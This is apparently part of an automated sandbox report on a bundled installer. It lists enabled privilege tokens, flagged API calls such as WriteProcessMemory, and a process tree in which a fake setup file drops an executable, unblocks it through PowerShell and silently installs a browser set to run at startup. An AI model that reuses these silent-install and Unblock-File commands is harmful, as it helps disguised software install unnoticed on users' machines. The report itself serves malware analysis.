| Token: SeBackupPrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A |
| Token: SeRemoteShutdownPrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A |
| Token: SeUndockPrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A |
| Token: SeManageVolumePrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A |
| Token: 33 | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A |
| Token: 34 | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A |
| Token: 35 | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A |
| Token: 36 | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeAssignPrimaryTokenPrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A |
| Token: SeUndockPrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A |
| Token: SeManageVolumePrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A |
| Token: SeAssignPrimaryTokenPrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A |
Suspicious use of FindShellTrayWindow
Suspicious use of SendNotifyMessage
Suspicious use of WriteProcessMemory
Processes
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://ify.ac/1Ic5
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=90.0.4430.212 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=90.0.818.66 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ffcebd73cb8,0x7ffcebd73cc8,0x7ffcebd73cd8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1852,6144302509164041047,9357137224680228676,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=1864 /prefetch:2
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1852,6144302509164041047,9357137224680228676,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2360 /prefetch:3
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1852,6144302509164041047,9357137224680228676,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2660 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1852,6144302509164041047,9357137224680228676,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3196 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1852,6144302509164041047,9357137224680228676,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3208 /prefetch:1
C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
C:\Program Files (x86)\Microsoft\Edge\Application\90.0.818.66\identity_helper.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\90.0.818.66\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=1852,6144302509164041047,9357137224680228676,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5252 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1852,6144302509164041047,9357137224680228676,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5260 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1852,6144302509164041047,9357137224680228676,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3968 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1852,6144302509164041047,9357137224680228676,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5400 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1852,6144302509164041047,9357137224680228676,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3368 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1852,6144302509164041047,9357137224680228676,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5580 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1852,6144302509164041047,9357137224680228676,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2480 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1852,6144302509164041047,9357137224680228676,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5956 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1852,6144302509164041047,9357137224680228676,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6620 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1852,6144302509164041047,9357137224680228676,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6352 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=1852,6144302509164041047,9357137224680228676,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6696 /prefetch:8
C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
C:\Users\Admin\Desktop\setup_NUyyEY7ilu.exe
"C:\Users\Admin\Desktop\setup_NUyyEY7ilu.exe"
C:\Users\Admin\AppData\Local\Temp\is-3ME7O.tmp\setup_NUyyEY7ilu.tmp
"C:\Users\Admin\AppData\Local\Temp\is-3ME7O.tmp\setup_NUyyEY7ilu.tmp" /SL5="$802CA,6467263,56832,C:\Users\Admin\Desktop\setup_NUyyEY7ilu.exe"
C:\Windows\SysWOW64\schtasks.exe
"C:\Windows\system32\schtasks.exe" /Delete /F /TN "cd_2_mp3-converter_7143"
C:\Users\Admin\AppData\Local\CD To MP3 Converter\cd2mp3converter32_64.exe
"C:\Users\Admin\AppData\Local\CD To MP3 Converter\cd2mp3converter32_64.exe" f563236f440fa25704e51ae95b9625e4
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 352 -p 4396 -ip 4396
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4396 -s 840
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 404 -p 4396 -ip 4396
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4396 -s 848
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 528 -p 4396 -ip 4396
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4396 -s 924
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 540 -p 4396 -ip 4396
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4396 -s 1044
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 532 -p 4396 -ip 4396
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4396 -s 1088
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 544 -p 4396 -ip 4396
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4396 -s 1048
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 552 -p 4396 -ip 4396
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4396 -s 1144
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 572 -p 4396 -ip 4396
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4396 -s 1160
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 516 -p 4396 -ip 4396
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4396 -s 1152
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 612 -p 4396 -ip 4396
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4396 -s 1056
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 620 -p 4396 -ip 4396
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4396 -s 964
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 552 -p 4396 -ip 4396
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4396 -s 1212
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 624 -p 4396 -ip 4396
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4396 -s 1152
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 624 -p 4396 -ip 4396
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4396 -s 1048
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 624 -p 4396 -ip 4396
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4396 -s 1048
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 684 -p 4396 -ip 4396
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4396 -s 1812
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 700 -p 4396 -ip 4396
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4396 -s 2012
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://t.me/bboobies
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 708 -p 4396 -ip 4396
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=90.0.4430.212 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=90.0.818.66 --initial-client-data=0x120,0x124,0x128,0xfc,0x12c,0x7ffcebd73cb8,0x7ffcebd73cc8,0x7ffcebd73cd8
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4396 -s 1704
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1852,6144302509164041047,9357137224680228676,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=19 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6436 /prefetch:1
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 700 -p 4396 -ip 4396
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4396 -s 1764
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1852,6144302509164041047,9357137224680228676,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=20 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6376 /prefetch:1
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 676 -p 4396 -ip 4396
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4396 -s 1796
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 728 -p 4396 -ip 4396
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4396 -s 1264
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 684 -p 4396 -ip 4396
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4396 -s 1748
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 696 -p 4396 -ip 4396
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4396 -s 1700
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 660 -p 4396 -ip 4396
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4396 -s 1728
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 656 -p 4396 -ip 4396
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4396 -s 2012
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 696 -p 4396 -ip 4396
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4396 -s 1864
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 704 -p 4396 -ip 4396
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4396 -s 1860
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 652 -p 4396 -ip 4396
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4396 -s 1820
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 700 -p 4396 -ip 4396
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4396 -s 2072
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 716 -p 4396 -ip 4396
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4396 -s 1824
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 636 -p 4396 -ip 4396
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4396 -s 1640
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 672 -p 4396 -ip 4396
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4396 -s 2096
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 724 -p 4396 -ip 4396
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4396 -s 2100
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 576 -p 4396 -ip 4396
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4396 -s 1824
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 604 -p 4396 -ip 4396
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4396 -s 1640
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 624 -p 4396 -ip 4396
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4396 -s 1844
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 656 -p 4396 -ip 4396
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4396 -s 1656
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 636 -p 4396 -ip 4396
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4396 -s 1844
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 636 -p 4396 -ip 4396
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4396 -s 2072
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 644 -p 4396 -ip 4396
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4396 -s 1112
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 644 -p 4396 -ip 4396
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4396 -s 2092
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 604 -p 4396 -ip 4396
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4396 -s 1860
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 636 -p 4396 -ip 4396
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4396 -s 1652
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c powershell -Command "Unblock-File -Path C:\Users\Admin\AppData\Local\Temp\d3pdEIHF\nKCK4ZJZ894JRgKi.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "Unblock-File -Path C:\Users\Admin\AppData\Local\Temp\d3pdEIHF\nKCK4ZJZ894JRgKi.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 728 -p 4396 -ip 4396
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4396 -s 1780
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 636 -p 4396 -ip 4396
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4396 -s 1844
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 616 -p 4396 -ip 4396
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4396 -s 1924
C:\Users\Admin\AppData\Local\Temp\d3pdEIHF\nKCK4ZJZ894JRgKi.exe
C:\Users\Admin\AppData\Local\Temp\d3pdEIHF\nKCK4ZJZ894JRgKi.exe --silent --allusers=0
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 592 -p 4396 -ip 4396
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4396 -s 2140
C:\Users\Admin\AppData\Local\Temp\7zSCAD89F79\setup.exe
C:\Users\Admin\AppData\Local\Temp\7zSCAD89F79\setup.exe --silent --allusers=0 --server-tracking-blob=YTZkZWRhZDNiNzMxNWZlYjNhNzA4ODE1NzgzOGY3Nzg4YjIyY2M3OTIxYmQyZjlhZmY4MzhmOThmZjRhZDYwOTp7ImNvdW50cnkiOiJHQiIsImluc3RhbGxlcl9uYW1lIjoiT3BlcmFTZXR1cC5leGUiLCJwcm9kdWN0Ijoib3BlcmEiLCJxdWVyeSI6Ii9vcGVyYS9zdGFibGUvd2luZG93cy8/dXRtX21lZGl1bT1hcGImdXRtX3NvdXJjZT1SU1RQJnV0bV9jYW1wYWlnbj1vcDEzMiIsInRpbWVzdGFtcCI6IjE3MjA5Nzk4OTYuMDQ5MCIsInVzZXJhZ2VudCI6Ik1vemlsbGEvNS4wIChXaW5kb3dzIE5UIDEwLjA7IFdpbjY0OyB4NjQpIEFwcGxlV2ViS2l0LzUzNy4zNiAoS0hUTUwsIGxpa2UgR2Vja28pIENocm9tZS8xMTguMC4wLjAgU2FmYXJpLzUzNy4zNiIsInV0bSI6eyJjYW1wYWlnbiI6Im9wMTMyIiwibWVkaXVtIjoiYXBiIiwic291cmNlIjoiUlNUUCJ9LCJ1dWlkIjoiODIxZGE0YjYtZDQzYy00ZDcwLTk5MzctNjk1ZjEyNjQzN2Y2In0=
C:\Users\Admin\AppData\Local\Temp\7zSCAD89F79\setup.exe
C:\Users\Admin\AppData\Local\Temp\7zSCAD89F79\setup.exe --type=crashpad-handler /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Crash Reports" "--crash-count-file=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\crash_count.txt" --url=https://crashstats-collector.opera.com/collector/submit --annotation=channel=Stable --annotation=plat=Win32 --annotation=prod=OperaDesktop --annotation=ver=112.0.5197.24 --initial-client-data=0x33c,0x340,0x344,0x320,0x348,0x71fbb1f4,0x71fbb200,0x71fbb20c
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 632 -p 4396 -ip 4396
C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\setup.exe
"C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\setup.exe" --version
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4396 -s 1924
C:\Users\Admin\AppData\Local\Temp\7zSCAD89F79\setup.exe
"C:\Users\Admin\AppData\Local\Temp\7zSCAD89F79\setup.exe" --backend --install --import-browser-data=0 --enable-stats=1 --enable-installer-stats=1 --consent-given=0 --general-interests=0 --general-location=0 --personalized-content=0 --personalized-ads=0 --launchopera=1 --installfolder="C:\Users\Admin\AppData\Local\Programs\Opera" --profile-folder --language=en --singleprofile=0 --copyonly=0 --allusers=0 --setdefaultbrowser=1 --pintotaskbar=1 --pintostartmenu=0 --run-at-startup=1 --show-intro-overlay --server-tracking-data=server_tracking_data --initial-pid=2984 --package-dir-prefix="C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_20240714175822" --session-guid=5224046d-bb2f-4f3d-8e31-ff9e513d16ac 